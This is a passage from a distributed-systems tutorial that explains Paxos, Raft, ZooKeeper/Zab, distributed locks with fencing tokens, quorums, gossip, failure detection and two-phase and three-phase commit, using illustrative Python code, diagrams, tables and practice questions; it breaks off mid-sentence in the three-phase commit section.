MUST propose the value with the highest proposal number
else -> may propose its own value
proposer -> acceptors: ACCEPT(n, value)
acceptor: accept unless it has promised a higher n
-> once a majority accepts, the value is CHOSEN, permanently
The subtle heart of the algorithm is the rule in bold: a proposer that learns of any previously accepted value must adopt it rather than proposing its own. That is what makes the choice permanent — once a value could have been chosen, every future proposal carries it forward, so no later round can choose differently.
class Acceptor:
def __init__(self):
self.promised_n = None # highest proposal number promised
self.accepted_n = None # proposal number of the accepted value
self.accepted_value = None
def prepare(self, n):
if self.promised_n is not None and n <= self.promised_n:
return None # reject: we promised a higher number
self.promised_n = n
# Report what we already accepted, so the proposer can preserve it.
return {"promised": n, "accepted_n": self.accepted_n,
"accepted_value": self.accepted_value}
def accept(self, n, value):
if self.promised_n is not None and n < self.promised_n:
return False # a newer proposal has superseded this one
self.promised_n = n
self.accepted_n, self.accepted_value = n, value
return True
class Proposer:
def propose(self, acceptors, my_value):
n = self.next_proposal_number() # globally unique, increasing
promises = [p for p in (a.prepare(n) for a in acceptors) if p]
if len(promises) <= len(acceptors) // 2:
return None # no majority; retry with a
# higher n
# THE CRITICAL RULE: if any acceptor already accepted something, that
# value may already have been chosen. Adopt the one with the highest
# accepted_n. Only if none exists may we propose our own.
prior = [p for p in promises if p["accepted_value"] is not None]
value = (max(prior, key=lambda p: p["accepted_n"])["accepted_value"]
if prior else my_value)
accepts = sum(a.accept(n, value) for a in acceptors)
return value if accepts > len(acceptors) // 2 else None
Basic Paxos agrees on a single value. Real systems need an ordered sequence of values — a replicated log — which is Multi-Paxos: run an instance per log slot, and observe that a stable proposer can skip Phase 1 for subsequent slots. That optimization is exactly a leader, and it reduces the steady state to one round trip per entry.
Paxos's two well-known problems in practice:
Duelling proposers. Two proposers repeatedly outbid each other in Phase 1, and neither reaches Phase 2. Safety holds; liveness does not. This is FLP made concrete, and the fix is to elect a distinguished proposer — again, a leader.
Underspecification. The original paper describes single-decree consensus and leaves membership changes, log compaction, and recovery to the implementer. Two teams implementing "Paxos" can produce systems that differ substantially, which is the practical complaint that motivated Raft.
| Variant | Contribution |
|---|---|
| Basic Paxos | Agreement on one value |
| Multi-Paxos | A log of values; a stable leader skips Phase 1 |
| Fast Paxos | One fewer round trip in the common case, larger quorums |
| Cheap Paxos | Uses auxiliary nodes only during failures |
| EPaxos | Leaderless; commutative commands commit in one round trip |
Key Takeaways
- Paxos guarantees safety unconditionally and liveness only when the network cooperates, exactly as FLP requires.
- Phase 1 collects promises and any previously accepted value; Phase 2 proposes and gets it accepted by a majority.
- The rule that a proposer must adopt any previously accepted value is what makes a chosen value permanent.
- Multi-Paxos with a stable leader is the practical form, reducing steady state to one round trip per log entry.
🧪 Practice
- Trace Basic Paxos with three acceptors and two proposers whose messages interleave, and show that only one value is chosen.
- Explain what breaks if a proposer ignores previously accepted values and always proposes its own.
- Interview: Why does Multi-Paxos skip Phase 1 for most entries? (Hint: what is Phase 1 actually establishing, and does it need re-establishing each time?)
Raft Consensus
Raft was designed in 2014 with an explicit goal that no prior protocol had: understandability. It provides the same guarantees as Multi-Paxos, but decomposes the problem into three independent pieces — leader election, log replication, and safety — so that each can be reasoned about separately.
Raft's central simplification is a strong leader. All client requests go to the leader, log entries flow only from leader to followers, and a follower never overwrites the leader's decisions. Where Paxos allows any proposer to act at any time, Raft insists on one direction of flow, and much of its clarity comes from that restriction.
Every node is in one of three states:
RAFT STATE MACHINE
times out, receives votes
starts election from a majority
+----------+ ------> +-----------+ ------> +--------+
| FOLLOWER | | CANDIDATE | | LEADER |
+----------+ <------ +-----------+ <------ +--------+
^ discovers a current leader discovers a
| or a higher term higher term
| |
+---------------------------------------+
Terms act as a logical clock. Every message carries a term; any node
seeing a higher term immediately reverts to follower.
Log replication is the steady-state path:
LOG REPLICATION AND COMMITMENT
client -> leader: SET x=5
leader appends to its own log (uncommitted), then:
leader [1:a][2:b][3:x=5]
follower [1:a][2:b][3:x=5] <- acknowledged
follower [1:a][2:b][3:x=5] <- acknowledged
follower [1:a][2:b] <- lagging, will be caught up
follower [1:a][2:b] <- lagging
A majority (3 of 5) has entry 3 -> the leader marks it COMMITTED,
applies it to its state machine, and replies to the client. Followers
learn of the commit on the next AppendEntries and apply it themselves.
def append_entries(self, term, leader_id, prev_log_index, prev_log_term,
entries, leader_commit):
"""Follower side: also serves as the heartbeat when entries is empty."""
if term < self.term:
return False, self.term # stale leader
self.reset_election_timer() # a valid leader exists
if term > self.term:
self.step_down(term)
# CONSISTENCY CHECK: refuse unless our log matches at prev_log_index.
# This single check inductively guarantees that if two logs agree at an
# index and term, they agree on EVERYTHING before it -- the Log Matching
# Property, which is why followers can never silently diverge.
if prev_log_index >= len(self.log) or \
(prev_log_index >= 0 and self.log[prev_log_index].term != prev_log_term):
return False, self.term # leader will retry with an
# earlier index until we match
# Delete any conflicting suffix, then append. The leader's log is truth.
self.log = self.log[:prev_log_index + 1] + entries
if leader_commit > self.commit_index:
self.commit_index = min(leader_commit, len(self.log) - 1)
self.apply_committed() # apply to the state machine
return True, self.term
Raft's safety rests on two rules that are easy to state and carry the whole argument:
Election restriction. A node only grants a vote if the candidate's log is at least as up to date as its own. Since a committed entry is on a majority, and any winning candidate needs a majority, the two majorities intersect — so any elected leader necessarily has every committed entry.
Commit only from the current term. A leader never marks an entry from a previous term as committed by counting replicas alone; it commits an entry of its own term, which carries the earlier ones with it. Without this rule there is a subtle scenario where a replicated-but-uncommitted entry can be overwritten after appearing safe.
def advance_commit_index(self):
"""Leader: find the highest index replicated on a majority."""
for n in range(len(self.log) - 1, self.commit_index, -1):
replicated = 1 + sum(1 for p in self.peers if self.match_index[p] >= n)
# The second condition is the subtle safety rule. Entries from older
# terms are committed only INDIRECTLY, by committing a current-term
# entry that follows them.
if replicated > (len(self.peers) + 1) // 2 and self.log[n].term == self.term:
self.commit_index = n
self.apply_committed()
return
| Aspect | Paxos | Raft |
|---|---|---|
| Leader | Optional optimization | Mandatory and central |
| Log flow | Any direction | Leader to followers only |
| Log holes | Permitted | Forbidden — logs are contiguous |
| Membership change | Unspecified | Joint consensus, specified |
| Specification | Single-decree; gaps | Complete, implementable |
Raft powers etcd (and therefore Kubernetes), Consul, CockroachDB, TiKV, and many others. It is the default choice for new systems needing consensus, not because it is faster — the performance is comparable — but because a protocol engineers can reason about produces implementations with fewer bugs.
Key Takeaways
- Raft provides Multi-Paxos guarantees while decomposing the problem into election, replication, and safety.
- A strong leader and a leader-to-follower-only log flow are the source of its comparative simplicity.
- The log matching consistency check makes divergence impossible; the election restriction guarantees a new leader holds every committed entry.
- A leader must commit an entry from its own term before earlier entries count as committed.
🧪 Practice
- Trace a five-node cluster where the leader fails after replicating an entry to two followers. Which nodes can win the next election?
- Explain the Log Matching Property and why the
prev_log_indexcheck is sufficient to maintain it.- Interview: Why can a Raft leader not commit a previous term's entry by counting replicas? (Hint: construct the sequence where that entry is later overwritten by a new leader.)
Zab and ZooKeeper
ZooKeeper is a coordination service — a small, strongly consistent, highly available store designed to hold the metadata that other distributed systems coordinate through. Its consensus protocol is Zab (ZooKeeper Atomic Broadcast), designed specifically for primary-backup replication of a state machine.
The reason a separate coordination service exists is economic. Consensus is hard to implement correctly and expensive to run, so rather than embedding it in every application, you run one well-tested cluster and let everything else delegate its hard coordination problems to it. Kafka (historically), HBase, Solr, and many others took exactly this route.
Zab's distinctive guarantee versus Paxos is primary order: writes from a single primary are delivered in the order that primary issued them, and a new primary's writes come after all of the previous one's. This is stronger than Paxos's guarantee and simpler for building a primary-backup replicated state machine.
ZAB PHASES
1. DISCOVERY followers report their latest epoch and history; the
prospective leader learns the most up-to-date state
2. SYNCHRONIZATION the leader brings every follower to an identical
history -- this is what enforces primary order
3. BROADCAST normal operation: two-phase proposal per write
BROADCAST detail (per write):
leader -> followers: PROPOSE(zxid, txn)
followers : write to disk, reply ACK
leader : on a QUORUM of ACKs -> COMMIT
leader -> followers: COMMIT(zxid)
zxid = (epoch << 32) | counter -- a 64-bit id where the high bits are the
leadership epoch, so ordering across leadership changes is automatic.
The data model is a hierarchical namespace of znodes, each holding a small amount of data (typically under 1 MB) plus metadata. Three znode flavours provide the coordination primitives:
| Type | Lifetime | Used for |
|---|---|---|
| Persistent | Until explicitly deleted | Configuration, cluster metadata |
| Ephemeral | Deleted when the session ends | Membership, liveness, locks |
| Sequential | Name gets a monotonic suffix | Queues, fair lock ordering |
Ephemeral nodes are the key idea. Because the node vanishes automatically when the creating client's session expires, liveness detection requires no separate heartbeat protocol — the existence of the znode is the liveness signal.
from kazoo.client import KazooClient
zk = KazooClient(hosts="zk1:2181,zk2:2181,zk3:2181")
zk.start()
# Leader election via ephemeral sequential nodes: each contender creates one,
# and the lowest sequence number wins.
path = zk.create("/election/node-", ephemeral=True, sequence=True)
# -> "/election/node-0000000042"
def try_become_leader():
children = sorted(zk.get_children("/election"))
my_name = path.rsplit("/", 1)[1]
if children[0] == my_name:
return become_leader()
# NOT the leader. Watch ONLY the node immediately ahead of us, never the
# whole list -- watching all of them means every node wakes on every
# change, which is the "herd effect" that makes naive implementations
# collapse at scale.
predecessor = children[children.index(my_name) - 1]
zk.exists(f"/election/{predecessor}", watch=lambda e: try_become_leader())
Two ZooKeeper behaviours cause most production surprises.
Reads are not linearizable by default. Reads are served from the local
server, which may lag. sync() before a read forces the server to catch up
first. Writes are always linearizable; reads are sequentially consistent unless
you ask for more.
Session expiry is decided by the cluster, not the client. A client that is GC-paused or partitioned may still believe its session is alive after the cluster has expired it and deleted its ephemeral nodes. Any lock built on ephemeral nodes therefore needs fencing, exactly as in the next topic.
# The correct read pattern when you need the latest value.
zk.sync("/config/database") # force this server to catch up
data, stat = zk.get("/config/database")
# Without sync(), you may read a value from before a write that has already
# been acknowledged to another client.
ZooKeeper's role has narrowed as systems adopt embedded Raft — Kafka's KRaft mode removed its ZooKeeper dependency, and etcd occupies much of the same niche with a simpler API. It remains widely deployed, and its primitives (ephemeral nodes, watches, sequential ordering) are the vocabulary that later coordination systems inherited.
Key Takeaways
- ZooKeeper is a coordination service that centralizes the hard consensus problem so applications do not each solve it.
- Zab adds primary order to consensus, matching the needs of primary-backup replication.
- Ephemeral znodes make liveness detection automatic; sequential nodes give fair ordering for locks and queues.
- Reads are local and can be stale unless preceded by
sync(), and session expiry is the cluster's decision, not the client's.
🧪 Practice
- Implement a distributed queue with sequential znodes and describe how consumers avoid taking the same item.
- Explain the herd effect in a naive lock implementation and how watching only the predecessor avoids it.
- Interview: A ZooKeeper client is GC-paused for 40 seconds with a 30-second session timeout. What happens to its lock? (Hint: two parties disagree about whether it still holds it — who is right, and who acts on it?)
Distributed Locks and Leases
A distributed lock grants one client exclusive access to a resource across machines. It is one of the most requested and most misused primitives in distributed systems, because it looks like a mutex and behaves nothing like one.
A local mutex is held by a thread whose existence the operating system can verify absolutely. A distributed lock is held by a process on another machine that may have crashed, paused, or been partitioned away — and the lock service cannot tell which. Every distributed lock therefore has a timeout, and the timeout is exactly the flaw: if the holder is merely slow, the lock expires while it is still working, and two clients hold it at once.
THE UNAVOIDABLE FAILURE OF A LOCK WITH A TIMEOUT
client 1: acquire ---[ working ]---[ GC PAUSE 20s ]---[ write! ]
lock: [------- 30s lease -------]X expired
client 2: acquire ---[ working ]---[ write! ]
^
BOTH clients write. Mutual exclusion is gone,
and neither client did anything wrong.
Making the lease longer does not fix it -- it only makes recovery from a
genuine crash slower. There is no timeout value that is correct.
The resolution is not a better lock. It is to stop relying on mutual exclusion for correctness and add fencing, so the protected resource itself rejects stale holders:
# Every lock acquisition returns a monotonically increasing fencing token.
def acquire_with_fence(resource, ttl_ms):
token = coordinator.increment_and_get(f"fence:{resource}") # monotonic
if coordinator.try_lock(resource, holder=self.id, ttl_ms=ttl_ms):
return token
raise LockUnavailable()
def write_protected(resource, data, token):
# The STORAGE layer enforces exclusion, not the lock service. A client
# that lost its lease carries an old token and is rejected here, even
# though it believes it still holds the lock.
current = storage.get_max_token(resource)
if token < current:
raise FencedOut(f"token {token} superseded by {current}")
storage.write(resource, data, token=token)
FENCING MAKES THE LATE WRITE HARMLESS
client 1: acquire -> token 33 ---[ pause ]--- write(token=33) -> REJECTED
client 2: acquire -> token 34 ---- write(token=34) -> accepted
Storage has seen 34, so 33 is refused. Client 1's belief that it holds
the lock no longer matters -- correctness does not depend on it.
The distinction that should govern every use of a distributed lock:
| Purpose | Consequence of double acquisition | Requirement |
|---|---|---|
| Efficiency | Duplicate work, wasted resources | A plain lock is fine |
| Correctness | Corruption, double charge, data loss | Fencing tokens are mandatory |
If the lock is an optimization — avoid two nodes generating the same report — a simple Redis lock is entirely adequate; the worst case is wasted CPU. If the lock protects correctness, a lock alone is never sufficient, no matter which service provides it.
# Redlock -- Redis's multi-instance lock algorithm -- and its caveat.
def redlock_acquire(resource, ttl_ms, instances):
start = time.monotonic()
token = str(uuid.uuid4())
acquired = sum(1 for r in instances
if r.set(resource, token, nx=True, px=ttl_ms))
elapsed_ms = (time.monotonic() - start) * 1000
validity = ttl_ms - elapsed_ms - CLOCK_DRIFT_ALLOWANCE
if acquired > len(instances) // 2 and validity > 0:
return token, validity
for r in instances: # failed: release everywhere
release(r, resource, token)
return None, 0
# Redlock's validity argument depends on bounded clock drift across the Redis
# instances. Martin Kleppmann's well-known critique is that this makes it a
# timing-dependent protocol, unsuitable for correctness-critical locking
# without fencing -- and with fencing, you did not need Redlock's guarantees.
Two further practices matter. Renew rather than over-provision: hold a short lease and extend it while demonstrably alive, so a genuine crash releases quickly while a long job is not cut off. And release only your own lock: deleting a key without checking the token can release a lock another client now holds, which is a classic bug in hand-rolled Redis locks.
Key Takeaways
- Distributed locks need timeouts, and any timeout allows a paused holder and a new holder to coexist.
- Distinguish efficiency locks (duplicate work is acceptable) from correctness locks (corruption is not).
- Correctness requires fencing tokens enforced by the protected resource, not by the lock service.
- Renew short leases instead of setting long ones, and always verify ownership before releasing.
🧪 Practice
- Give a concrete sequence where two clients hold the same lock, and show how a fencing token makes the outcome correct.
- Write a Lua script for a safe Redis lock release that verifies ownership atomically.
- Interview: Is a Redis lock safe for guarding a bank transfer? (Hint: ask what the storage layer does when a client with an expired lease writes.)
Quorum Systems
A quorum is a subset of nodes whose agreement is sufficient to act. Quorum systems are the mathematical backbone of consensus, replication, and partition handling: they turn "I cannot contact everyone" into "I can still proceed safely."
The property that makes them work is intersection. If every quorum overlaps with every other quorum, then any two operations that each obtained a quorum share at least one node — and that shared node carries the information linking them. Majority quorums are the simplest way to guarantee intersection, since two subsets each larger than half of a set must share a member.
WHY MAJORITY INTERSECTION GUARANTEES SAFETY
5 nodes: A B C D E
write quorum: {A, B, C} read quorum: {C, D, E}
\ /
+---- C is in BOTH ---+
C holds the write, so the read sees it. No arrangement of two majorities
can avoid sharing at least one node -- which is why "majority" is not a
heuristic but a proof.
def quorum_analysis(N):
"""Standard majority quorums."""
majority = N // 2 + 1
return {
"nodes": N,
"quorum_size": majority,
"failures_tolerated": N - majority,
"efficiency": majority / N, # fraction that must respond
}
for N in (3, 4, 5, 6, 7, 9):
a = quorum_analysis(N)
print(f"N={N}: quorum={a['quorum_size']} tolerates={a['failures_tolerated']}")
# N=3: quorum=2 tolerates=1 N=6: quorum=4 tolerates=2
# N=4: quorum=3 tolerates=1 N=7: quorum=4 tolerates=3
# N=5: quorum=3 tolerates=2 N=9: quorum=5 tolerates=4
#
# Even sizes gain nothing: 4 tolerates the same 1 failure as 3, while costing
# an extra node and an extra vote per decision. Always use odd cluster sizes.
Beyond simple majorities, several quorum designs trade properties differently:
| Quorum type | Structure | Advantage |
|---|---|---|
| Majority | Any N/2 + 1 nodes | Simple; maximum fault tolerance |
| Weighted | Nodes carry different vote counts | Reflects heterogeneous capacity |
| Grid | Nodes in a matrix; a row plus a column | Quorum size ~2*sqrt(N) |
| Hierarchical | Majority of majorities of subgroups | Rack and DC awareness |
| Flexible (Raft) | Election and replication quorums differ | Tune latency versus tolerance |
Flexible quorums are the most practically interesting refinement. Consensus only requires that the election quorum intersects the replication quorum — not that each is a majority. That permits deliberately asymmetric configurations:
def flexible_paxos(N, replication_q, election_q):
"""Safety needs only Qr + Qe > N, not majorities on both sides."""
return {
"safe": replication_q + election_q > N,
"write_latency_nodes": replication_q,
"failures_tolerated_for_writes": N - replication_q,
}
print(flexible_paxos(N=5, replication_q=2, election_q=4))
# {'safe': True, 'write_latency_nodes': 2, 'failures_tolerated_for_writes': 3}
#
# Writes need only 2 acknowledgements instead of 3 -- lower latency on the
# hot path -- at the cost of elections needing 4 nodes, which are rare.
# Optimizing the common case at the expense of the rare one.
Three practical considerations complete the picture.
Witness nodes. A lightweight node that votes but stores no data breaks ties without the cost of a full replica. A two-datacentre deployment with a witness in a third location is the standard way to get majority safety without a third full site.
Rack and zone awareness. A majority that happens to sit entirely in one rack provides no protection against that rack failing. Quorum placement must span failure domains, or the arithmetic is satisfied while the intent is not.
Read repair and hinted handoff. In Dynamo-style systems, quorum reads that observe divergent replicas repair them in the background, and writes destined for an unavailable node are held by a peer and delivered on recovery. These are what keep an eventually consistent quorum system converging in practice.
Key Takeaways
- Quorums work because any two of them intersect, so information passes through the shared node.
- Majority quorums tolerate
N - (N/2 + 1)failures; even cluster sizes waste a node.- Flexible quorums need only
Qr + Qe > N, allowing fast writes at the cost of more expensive elections.- Quorums must span failure domains, and witness nodes provide majority safety without a full third replica.
🧪 Practice
- For
N = 7, list three(Qr, Qe)pairs that are safe and rank them by write latency.- Explain why a 4-node cluster is strictly worse than a 3-node one.
- Interview: You run two datacentres and want to survive losing either. What do you deploy? (Hint: a majority cannot exist within two equal groups — something must live somewhere else.)
Gossip Protocols
Gossip protocols spread information the way rumours spread through a crowd: each node periodically picks a few random peers and shares what it knows. There is no coordinator, no fixed topology, and no global view — yet information reaches every node quickly and the mechanism tolerates failures gracefully.
The motivation is that broadcast-based approaches do not scale. Having every node
tell every other node costs O(N²) messages per round, and a coordinator that
tells everyone is both a bottleneck and a single point of failure. Gossip
achieves complete dissemination in O(log N) rounds with a constant number of
messages per node per round, and it degrades smoothly when nodes fail.
EPIDEMIC SPREAD: O(log N) ROUNDS
round 0: 1 node knows *
round 1: 2 nodes * *
round 2: 4 nodes * * * *
round 3: 8 nodes * * * * * * * *
round 4: 16 nodes ...
10,000 nodes: ~14 rounds. At one round per second, the whole cluster
knows within roughly 14 seconds -- with each node sending only a few
messages per second, regardless of cluster size.
import random
class GossipNode:
def __init__(self, node_id, peers, fanout=3):
self.id, self.peers = node_id, peers
self.fanout = fanout # peers contacted per round; 3 is typical
self.state = {} # key -> (value, version, heartbeat)
def tick(self):
"""One gossip round -- typically every 0.5 to 1 second."""
targets = random.sample(self.peers, min(self.fanout, len(self.peers)))
for peer in targets:
# Push-pull: send our digest, receive theirs, exchange only the
# differences. Push alone is slower to converge at the tail;
# pull alone is slow to start. Push-pull is the usual choice.
their_state = peer.exchange(self.digest())
self.merge(their_state)
def merge(self, other):
for key, (value, version, hb) in other.items():
mine = self.state.get(key)
# Version comparison makes merge COMMUTATIVE and IDEMPOTENT, which
# is what lets messages arrive in any order, repeatedly, without
# corrupting the result.
if mine is None or version > mine[1]:
self.state[key] = (value, version, hb)
Gossip's properties come directly from its randomness:
| Property | Consequence |
|---|---|
| Scalable | Constant work per node regardless of cluster size |
| Fault tolerant | No node is required; failures are routed around implicitly |
| Eventually consistent | Convergence is probabilistic, not immediate |
| Redundant | Nodes receive the same information several times |
| Self-healing | A recovering node is caught up by the next exchanges |
The costs are equally direct. Convergence is eventual and probabilistic — there is no moment when the protocol declares completeness — and the redundancy means measurable steady-state bandwidth even when nothing changes. Tuning fanout and interval is a trade between convergence speed and network cost:
import math
def convergence_estimate(N, fanout, interval_s):
rounds = math.log(N) / math.log(1 + fanout) # approximate
return {
"rounds": round(rounds, 1),
"seconds": round(rounds * interval_s, 1),
"msgs_per_node_per_s": fanout / interval_s,
}
print(convergence_estimate(N=1000, fanout=3, interval_s=1.0))
# {'rounds': 5.0, 'seconds': 5.0, 'msgs_per_node_per_s': 3.0}
print(convergence_estimate(N=1000, fanout=6, interval_s=1.0))
# {'rounds': 3.5, 'seconds': 3.5, 'msgs_per_node_per_s': 6.0}
#
# Doubling fanout doubles bandwidth and improves convergence by ~30%.
# Diminishing returns arrive quickly; fanout 3-5 is the usual sweet spot.
Gossip is used for exactly the problems where eventual convergence is acceptable and scale is high: cluster membership and failure detection (Cassandra, Consul, Serf), configuration propagation, aggregate metrics, and CRDT state exchange. It is emphatically not suitable where agreement is required — you cannot gossip your way to a leader election or a committed transaction, because gossip provides no decision point and no guarantee that everyone has converged yet.
Key Takeaways
- Gossip disseminates information via random peer exchanges, reaching all nodes in
O(log N)rounds with constant per-node cost.- It is highly fault tolerant and self-healing because no specific node is required for progress.
- Merges must be commutative and idempotent, since messages arrive repeatedly and out of order.
- It provides eventual convergence with no completion signal, so it cannot replace consensus for decisions requiring agreement.
🧪 Practice
- Estimate the rounds and seconds to converge for 50,000 nodes at fanout 4 and a 500 ms interval.
- Explain why the merge function must be idempotent, with a concrete failure if it is not.
- Interview: Cassandra uses gossip for membership but Paxos for lightweight transactions. Why not gossip for both? (Hint: what does gossip never tell you about the state of the cluster?)
Membership and Failure Detection
Every distributed system must maintain a view of which nodes exist and which are alive. That sounds mechanical, and it is genuinely difficult, because FLP guarantees you can never be certain a node has failed — only that it has not responded within a time you chose.
Failure detectors are therefore characterized by two properties in tension:
- Completeness: every genuinely failed node is eventually suspected.
- Accuracy: no correct node is wrongly suspected.
You can have perfect completeness by suspecting everyone, and perfect accuracy by suspecting nobody. Every real detector picks a point between, and the timeout is the dial.
THE DETECTION TRADE-OFF
aggressive (timeout 500 ms) conservative (timeout 30 s)
+ detects real failures fast + almost never wrong
- a GC pause looks like death - a dead node keeps receiving traffic
- false positives cause needless for half a minute
failovers, rebalances, and
elections -- each of which
costs availability
The cost of a FALSE POSITIVE is usually higher than a slightly slower
detection, because a spurious failover has all the cost of a real one.
A significant improvement over fixed timeouts is the phi accrual failure detector, which outputs a continuous suspicion level rather than a boolean. Instead of asking "is it dead?", it reports "how surprising is this silence, given the history of this node's heartbeat intervals?" — which lets different subsystems apply different thresholds to the same signal.
import math, statistics
from collections import deque
class PhiAccrualDetector:
def __init__(self, window=1000, threshold=8.0):
self.intervals = deque(maxlen=window) # observed heartbeat gaps
self.last_heartbeat = None
self.threshold = threshold # phi 8 ~ 1 in 10^8 chance of
# a false positive
def heartbeat(self, now):
if self.last_heartbeat is not None:
self.intervals.append(now - self.last_heartbeat)
self.last_heartbeat = now
def phi(self, now):
"""Suspicion level: -log10(probability this silence is normal)."""
if not self.intervals or self.last_heartbeat is None:
return 0.0
elapsed = now - self.last_heartbeat
mean = statistics.fmean(self.intervals)
stdev = max(statistics.pstdev(self.intervals), 1e-3)
# Probability that a normal interval would already have exceeded
# `elapsed`. As elapsed grows past the historical distribution, phi
# rises smoothly -- so a node on a slow network gets more slack
# automatically, without any manual per-node tuning.
p = 1 - _normal_cdf(elapsed, mean, stdev)
return -math.log10(max(p, 1e-12))
def is_suspected(self, now):
return self.phi(now) > self.threshold
Membership protocols build on detection. The dominant design is SWIM (Scalable Weakly-consistent Infection-style Membership), used by Consul's Serf, HashiCorp's tooling, and others. Its two ideas both address false positives:
SWIM: INDIRECT PROBING
1. Node A probes node B directly.
2. No response within the timeout.
3. Instead of declaring B dead, A asks k random peers to probe B:
A --ping-req(B)--> C --ping--> B
A --ping-req(B)--> D --ping--> B
4. If ANY of them reaches B, B is alive and the A-B path was the problem.
Only if all indirect probes also fail is B suspected.
This distinguishes "B is dead" from "A cannot reach B" -- an asymmetric
network failure that a direct-probe-only detector would misdiagnose.
SUSPICION MECHANISM: a suspected node is marked "suspect" and gossiped as
such, giving it a window to refute the claim before being declared dead.
| Approach | Detection quality | Message cost per round |
|---|---|---|
| All-to-all heartbeat | Fast, accurate | O(N²) — does not scale |
| Centralized monitor | Simple | O(N), single point of failure |
| Gossip heartbeats | Good, scalable | O(N) total |
| SWIM | Very good; handles asymmetric failure | O(1) per node |
| Phi accrual | Adaptive per node | Depends on transport |
Two operational points close the topic. First, suspicion should be gossiped before death is declared, so that a node experiencing a brief pause has a chance to refute it — the alternative is a cluster that churns membership every time a JVM collects garbage. Second, membership changes should be rate limited: a network blip that causes a large fraction of nodes to be simultaneously suspected must not trigger simultaneous rebalancing, which turns a transient event into a real outage.
Key Takeaways
- Failure detection trades completeness against accuracy, and the cost of a false positive usually exceeds that of slower detection.
- Phi accrual detectors output a continuous suspicion level derived from observed heartbeat history, adapting per node automatically.
- SWIM's indirect probing distinguishes a dead node from an unreachable path, and its suspicion phase gives nodes a chance to refute.
- Rate-limit membership changes so a transient network event does not trigger cluster-wide rebalancing.
🧪 Practice
- Compute the message cost per round for all-to-all heartbeats versus SWIM at 1,000 nodes.
- Explain how phi accrual gives a node on a slow link more slack without any manual configuration.
- Interview: A brief network blip causes 40% of your cluster to be marked dead, and the resulting rebalance takes the service down. What do you change? (Hint: the detection was arguably correct — the problem is what happened next, and how fast.)
<a id="85-distributed-transactions"></a>
8.5 Distributed Transactions
A local transaction gets atomicity from a single storage engine that controls every write. Once the writes span two databases or two services, no such controller exists, and atomicity must be constructed from protocols — each with a different price.
Two-Phase Commit
Two-phase commit (2PC) is the classic protocol for making a transaction atomic across several participants. A coordinator drives two rounds: first it asks everyone whether they can commit, then it tells everyone the collective outcome.
The reason a second round is needed is that a participant cannot decide alone. If each simply committed when ready, one failing while others succeeded would leave the system half-updated. The prepare phase separates ability to commit from the decision to commit, so nobody acts until the outcome is known.
The pivotal obligation is what "prepared" means. A participant voting yes is making a binding promise: it has written everything it needs to durable storage, taken the necessary locks, and guarantees it can commit even if it crashes and restarts. It has given up the right to change its mind.
TWO-PHASE COMMIT
PHASE 1 (prepare) PHASE 2 (commit)
coordinator coordinator
|--- PREPARE ---> A |--- COMMIT ---> A
|--- PREPARE ---> B |--- COMMIT ---> B
|--- PREPARE ---> C |--- COMMIT ---> C
|<--- YES ------- A |<--- ACK ------ A
|<--- YES ------- B |<--- ACK ------ B
|<--- YES ------- C |<--- ACK ------ C
| |
all YES -> decide COMMIT transaction complete
any NO -> decide ABORT
Once a participant votes YES it has written a prepare record to disk and
MUST be able to honour either outcome, across a crash and restart.
def two_phase_commit(coordinator, participants, txn):
# PHASE 1: collect votes.
votes = {}
for p in participants:
try:
votes[p] = p.prepare(txn) # p durably logs its intent here
except (Timeout, ConnectionError):
votes[p] = False # unreachable counts as NO
coordinator.log_decision(txn.id, "commit" if all(votes.values()) else "abort")
# ^ THE decision point. This log write must be durable BEFORE phase 2,
# because it is the only record of what was decided.
# PHASE 2: broadcast the outcome, retrying forever.
decision = coordinator.read_decision(txn.id)
for p in participants:
# Participants cannot be allowed to give up. A participant that is
# down must be told the outcome when it returns -- so this retries
# indefinitely rather than failing.
retry_until_success(lambda: p.commit(txn) if decision == "commit"
else p.abort(txn))
return decision
2PC guarantees atomicity, and its cost is severe: it is a blocking protocol. If the coordinator fails after participants have voted yes but before delivering the decision, those participants are stuck. They cannot commit (the decision might have been abort), cannot abort (it might have been commit), and must hold their locks until the coordinator returns.
THE BLOCKING WINDOW
coordinator: PREPARE ---> all vote YES ---> X CRASHES before deciding
participant A: prepared, locks held, waiting ...
participant B: prepared, locks held, waiting ...
A and B cannot resolve this by talking to each other: neither knows what
the coordinator decided, and the coordinator may have already told a third
participant to commit. They must WAIT for the coordinator to recover.
Meanwhile every row they locked is unavailable to everyone else. One
coordinator failure can freeze a large part of the system.
| Property | Behaviour |
|---|---|
| Atomicity | Guaranteed |
| Availability | Poor — blocks on coordinator failure |
| Latency | At least two round trips plus multiple disk syncs |
| Lock duration | Held across the whole protocol, including the network |
| Scalability | Degrades with participant count; failure probability compounds |
The mitigations used in practice are worth knowing. Making the coordinator itself fault-tolerant — replicated via Raft, as Spanner and CockroachDB do — removes the single point of failure and turns 2PC from unusable into merely expensive. Participant timeouts with a cooperative termination protocol let participants ask each other what they know, which resolves some but not all blocking cases. And keeping the participant count small bounds both latency and the probability that any one participant fails mid-protocol.
2PC remains appropriate within a single trust and administrative domain where strict atomicity is required — across shards of one database, or in an XA transaction spanning a database and a message broker. Across microservice boundaries it is generally the wrong tool, because it couples the availability of every participant to every other, and sagas (two topics ahead) trade atomicity for that independence.
Key Takeaways
- 2PC separates the ability to commit from the decision, so no participant acts before the outcome is known.
- A
yesvote is a durable, binding promise the participant must honour across a crash.- It blocks: a coordinator failure after voting leaves participants holding locks with no way to resolve.
- Replicating the coordinator via consensus is what makes 2PC viable; across service boundaries prefer sagas.
🧪 Practice
- List every failure point in 2PC and state which are recoverable without the coordinator.
- Compute the probability that at least one of eight participants fails during a 200 ms protocol, given a per-node failure rate of 0.1% per second.
- Interview: Why is 2PC unsuitable across microservices? (Hint: consider what one service's availability now depends on, and for how long its rows are locked.)
Three-Phase Commit
Three-phase commit was designed to remove 2PC's blocking problem by inserting an extra round between the vote and the commit. The added phase communicates "we are all going to commit" before anyone actually does, so a participant that loses the coordinator can infer the outcome from its own state.
The insight is that 2PC blocks because a prepared participant cannot distinguish
"the coordinator decided commit" from "the coordinator decided abort". 3PC
removes that ambiguity by making the decision observable in an intermediate
state: if a participant has received PRE-COMMIT, it knows every participant
voted yes, so commit is the only possible outcome.
THREE-PHASE COMMIT
PHASE 1 CAN-COMMIT? -> votes collected (no locks taken yet, in some
formulations)
PHASE 2 PRE-COMMIT -> "everyone voted yes; prepare to commit"
participants acknowledge and may now infer the
outcome on their own
PHASE 3 DO-COMMIT -> "commit now"
RECOVERY RULE after coordinator failure:
a participant in PRE-COMMIT state -> COMMIT (everyone voted yes)
a participant not yet in PRE-COMMIT -> ABORT (nobody could have committed)
Participants can also query each other and reach the same conclusion,
